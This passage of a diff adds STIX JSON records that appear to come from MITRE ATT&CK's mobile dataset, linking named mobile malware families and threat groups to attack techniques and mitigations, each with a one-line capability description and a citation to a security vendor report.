Retrieved October 29, 2020.", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:24:43.120Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can request device administrator permissions.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--9c049d7b-c92a-4733-9381-27e2bd2ccadc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--4de3f794-63df-4f9e-8bd8-59796d91aa36", + "created": "2020-05-07T15:33:32.895Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) shows fraudulent ads to generate revenue.(Citation: CheckPoint Agent Smith)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--22041a01-75e7-4ff6-8768-ad45188c53c7", + "created": "2023-02-28T21:45:25.064Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. 
Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-01T22:03:00.755Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can obtain a list of installed applications.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--42ae42eb-ea75-457a-bf39-4ea04304dd0b", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Gooligan Citation", + "url": "http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan/", + "description": "Check Point Research Team. (2016, November 30). More Than 1 Million Google Accounts Breached by Gooligan. Retrieved December 12, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Gooligan](https://attack.mitre.org/software/S0290) can install adware to generate revenue.(Citation: Gooligan Citation)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--20d56cd6-8dff-4871-9889-d32d254816de", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0bc73d69-e769-4d0f-9d44-368c94225b6e", + "created": "2020-07-15T20:20:59.200Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Bitdefender Mandrake", + "description": "R. Gevers, M. Tivadar, R. Bleotu, A. M. Barbatei, et al.. (2020, May 14). Uprooting Mandrake: The Story of an Advanced Android Spyware Framework That Went Undetected for 4 Years. 
Retrieved July 15, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/329/Bitdefender-PR-Whitepaper-Mandrake-creat4464-en-EN-interactive.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:50:39.124Z", + "description": "[Mandrake](https://attack.mitre.org/software/S0485) can access the device’s contact list.(Citation: Bitdefender Mandrake)", + "relationship_type": "uses", + "source_ref": "malware--52c994fa-b6c8-45a8-9586-a4275cf19307", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0e9968b7-ad1e-440d-9fe3-2599a1571f39", + "created": "2020-06-26T14:55:13.387Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cybereason EventBot", + "description": "D. Frank, L. Rochberger, Y. Rimmer, A. Dahan. (2020, April 30). EventBot: A New Mobile Banking Trojan is Born. 
Retrieved June 26, 2020.", + "url": "https://www.cybereason.com/blog/eventbot-a-new-mobile-banking-trojan-is-born" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:59:55.854Z", + "description": "[EventBot](https://attack.mitre.org/software/S0478) communicates with the C2 using HTTP requests.(Citation: Cybereason EventBot)", + "relationship_type": "uses", + "source_ref": "malware--aecc0097-c9f8-4786-9b39-e891ff173f54", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--545d9313-3fcc-4d4a-b9d2-7555430df8f2", + "created": "2019-09-04T14:28:15.482Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:28:58.447Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can reset the user's password/PIN.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--e2c2249a-eb82-4614-8dd4-9c514dde65e2", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3dd0cd4d-bcde-4105-b98e-b32add191083", + "created": "2020-01-27T17:05:58.331Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:39:39.589Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) exfiltrates data using HTTP POST requests.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--25cdb4f2-5b38-411c-bfb6-eca7ea4d4527", + "created": "2019-09-04T14:28:16.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-Monokle", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:57:56.616Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can retrieve nearby cell tower and Wi-Fi network information.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--dd818ea5-adf5-41c7-93b5-f3b839a219fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e9607e4f-5743-4bbb-b7d4-5554d66c8be7", + "type": "relationship", + "created": "2019-08-07T15:57:13.388Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky Riltok June 2019", + "url": "https://securelist.com/mobile-banker-riltok/91374/", + "description": "Tatyana Shishkova. (2019, June 25). Riltok mobile Trojan: A banker with global reach. Retrieved August 7, 2019." + } + ], + "modified": "2019-09-18T13:44:13.453Z", + "description": "[Riltok](https://attack.mitre.org/software/S0403) injects input to set itself as the default SMS handler by clicking the appropriate places on the screen. 
It can also close or minimize targeted antivirus applications and the device security settings screen.(Citation: Kaspersky Riltok June 2019)", + "relationship_type": "uses", + "source_ref": "malware--c0efbaae-9e7d-4716-a92d-68373aac7424", + "target_ref": "attack-pattern--d1f1337e-aea7-454c-86bd-482a98ffaf62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--44304163-9a44-4760-bd04-0e14adb33299", + "created": "2022-04-01T15:13:40.779Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Trend Micro iOS URL Hijacking", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/", + "description": "L. Wu, Y. Zhou, M. Li. (2019, July 12). iOS URL Scheme Susceptible to Hijacking. Retrieved September 11, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "iOS 11 introduced a first-come-first-served principle for URIs, allowing only the prior installed app to be launched via the URI.(Citation: Trend Micro iOS URL Hijacking) Android 6 introduced App Links.", + "modified": "2022-04-01T15:13:40.779Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--233fe2c0-cb41-4765-b454-e0087597fbce", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0b693e45-cc20-45a9-846f-2f5f4d3a3253", + "type": "relationship", + "created": "2020-12-31T18:25:05.178Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
"external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." + } + ], + "modified": "2020-12-31T18:25:05.178Z", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) has fingerprinted devices to uniquely identify them.(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--df337ad4-c88e-425f-b869-ecac29674bf4", + "type": "relationship", + "created": "2021-03-25T16:39:40.200Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020." 
+ } + ], + "modified": "2021-03-25T16:39:40.200Z", + "description": "(Citation: CYBERWARCON CHEMISTGAMES)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9e3921a8-a9e1-48c4-9b61-ff190c104f63", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-08-09T17:53:48.793Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can monitor clipboard content.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--07fd2c39-c3e2-4044-b00b-71250cd7df2e", + "created": "2022-03-30T18:15:03.625Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T18:15:03.625Z", + "relationship_type": "subtechnique-of", + "source_ref": 
"attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--4c6f1475-3b92-4a37-8bb5-4dcc69660b11", + "created": "2022-09-29T20:08:54.389Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T18:38:37.195Z", + "description": "During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Android backdoors capable of exfiltrating specific files directly from the infected devices.(Citation: Cylance Dust Storm)", + "relationship_type": "uses", + "source_ref": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b49ecb71-92b3-4813-be4d-9f8c2aa67ccd", + "created": "2021-02-08T16:36:20.707Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). 
BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:05:01.189Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has installed malicious MDM profiles on iOS devices as part of Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a7b276ac-6f07-4d1f-8d24-dc5682acf62d", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. 
Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:13:36.481Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) accesses calendar entries.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c5cb9fb4-2593-412f-82f8-a04a125bd429", + "created": "2022-04-01T18:51:28.859Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Security updates frequently contain patches to vulnerabilities that can be exploited for root access.", + "modified": "2022-04-01T18:51:28.859Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3498d304-48e3-4fe4-a3ab-fc261104f413", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": 
"https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-08-09T17:59:49.094Z", + "description": "[Stealth Mango](https://attack.mitre.org/software/S0328) can record audio using the device microphone.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--085eb36d-697d-4d9a-bac3-96eb879fe73c", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--8d027310-93a0-4046-b7ad-d1f461f30838", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. 
Retrieved December 22, 2016.", + "source_name": "TrendMicro-RCSAndroid" + } + ], + "modified": "2019-08-09T17:53:48.783Z", + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) has the ability to dynamically download and execute new code at runtime.(Citation: TrendMicro-RCSAndroid)", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bf901bab-3caa-4d05-a859-d9fb4d838304", + "type": "relationship", + "created": "2019-10-10T15:27:22.091Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "source_name": "Lookout-StealthMango" + } + ], + "modified": "2019-10-10T15:27:22.091Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) accesses browser history, pictures, and videos.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5dd9e0aa-e4dc-4776-9580-5a765c2cc08d", + "created": "2023-02-06T18:52:40.543Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). 
Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:14:41.449Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can intercept SMS messages containing two factor authentication codes.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--721cc30c-74cf-4eed-89a8-7a8e63e6c0e1", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Tripwire-MazarBOT", + "description": "Graham Cluley. (2016, February 16). Android users warned of malware attack spreading via SMS. 
Retrieved December 23, 2016.", + "url": "https://www.tripwire.com/state-of-security/security-data-protection/android-malware-sms/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:27:47.788Z", + "description": "[MazarBOT](https://attack.mitre.org/software/S0303) can intercept two-factor authentication codes sent by online banking apps.(Citation: Tripwire-MazarBOT)", + "relationship_type": "uses", + "source_ref": "malware--5ddf81ea-2c06-497b-8c30-5f1ab89a40f9", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a93ee044-bd5d-48f3-972e-0abab780c35c", + "created": "2023-02-08T20:05:06.786Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. 
Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:21:22.070Z", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) can steal information via malicious JavaScript.(Citation: trendmicro_tianyspy_0122)", + "relationship_type": "uses", + "source_ref": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "target_ref": "attack-pattern--29f1f56c-7b7a-4c14-9e39-59577ea2743c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b53d1c92-b71f-434e-aa4f-08b8db765248", + "type": "relationship", + "created": "2019-07-10T15:25:57.604Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
